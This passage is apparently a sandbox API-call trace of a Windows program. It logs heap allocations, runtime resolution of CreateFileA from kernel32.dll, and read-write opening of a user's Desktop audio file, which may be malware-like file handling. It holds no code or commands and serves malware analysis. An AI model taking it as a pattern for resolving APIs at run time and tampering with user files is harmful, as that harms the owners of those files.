(HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0029.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0029.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0029.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0029.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0029.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0029.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0029.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0029.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0029.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0029.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0029.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0029.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0029.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0029.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0029.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0029.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0029.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0029.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0029.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0029.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0029.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0029.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0029.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0029.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0029.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0029.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0029.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0029.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0029.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0029.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0029.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0029.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0029.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0029.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0029.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0029.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0029.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0029.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0029.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0029.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0029.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0029.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0029.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0029.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0029.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0029.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0029.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0029.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0029.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0029.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0029.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0029.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0029.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0029.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0029.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0029.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0029.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0029.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0029.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0029.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0029.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0029.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0029.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0029.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0029.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0029.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0029.731] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0029.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0029.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0029.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cd30 [0029.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cd30, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0029.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0029.731] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0029.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0029.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0029.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0029.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0029.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0029.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0029.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0029.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd30 [0029.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88cd30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0029.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0029.732] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0029.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0029.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0029.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0029.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0029.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0029.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0029.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0029.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0029.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0029.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0029.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0029.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0029.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x88ffb0 [0029.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0029.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3f) returned 0x7ab260 [0029.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a", cchWideChar=63, lpMultiByteStr=0x7ab260, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a", lpUsedDefaultChar=0x0) returned 63 [0029.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0029.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0029.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0029.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0029.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0029.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0029.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0029.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0029.733] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aoaigepyfblnzs8itqgh.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0029.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0029.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0029.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0029.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0029.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0029.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0029.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0029.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0029.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0029.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0029.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0029.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0029.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0029.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0029.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=63, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0029.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7e) returned 0x7d5bb8 [0029.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=63, lpWideCharStr=0x7d5bb8, cchWideChar=63 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aOaIGEPyFbLNzs8iTQgh.m4a") returned 63 [0029.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0029.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0029.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0029.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0029.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0029.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0029.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0029.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0029.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0029.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0029.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0029.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0029.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0029.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0029.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0029.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0029.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0029.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0029.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0029.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0029.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0029.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0029.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0029.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0029.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0029.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0029.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0029.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0029.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0029.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0029.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0029.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0029.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0029.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0029.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0029.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0029.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0029.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0029.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0029.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0029.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0029.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0029.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0029.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0029.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0029.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0029.735] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0029.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0029.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0029.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0029.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0029.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0029.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0029.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0029.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0029.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0029.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0029.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0029.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0029.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0029.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0029.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0029.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0029.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0029.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0029.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0029.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0029.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0029.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0029.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0029.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0029.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0029.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0029.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0029.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0029.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0029.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0029.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0029.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0029.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0029.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0029.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0029.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0029.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0029.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0029.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0029.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.736] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0029.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0029.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0029.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0029.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0029.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0029.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0029.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) 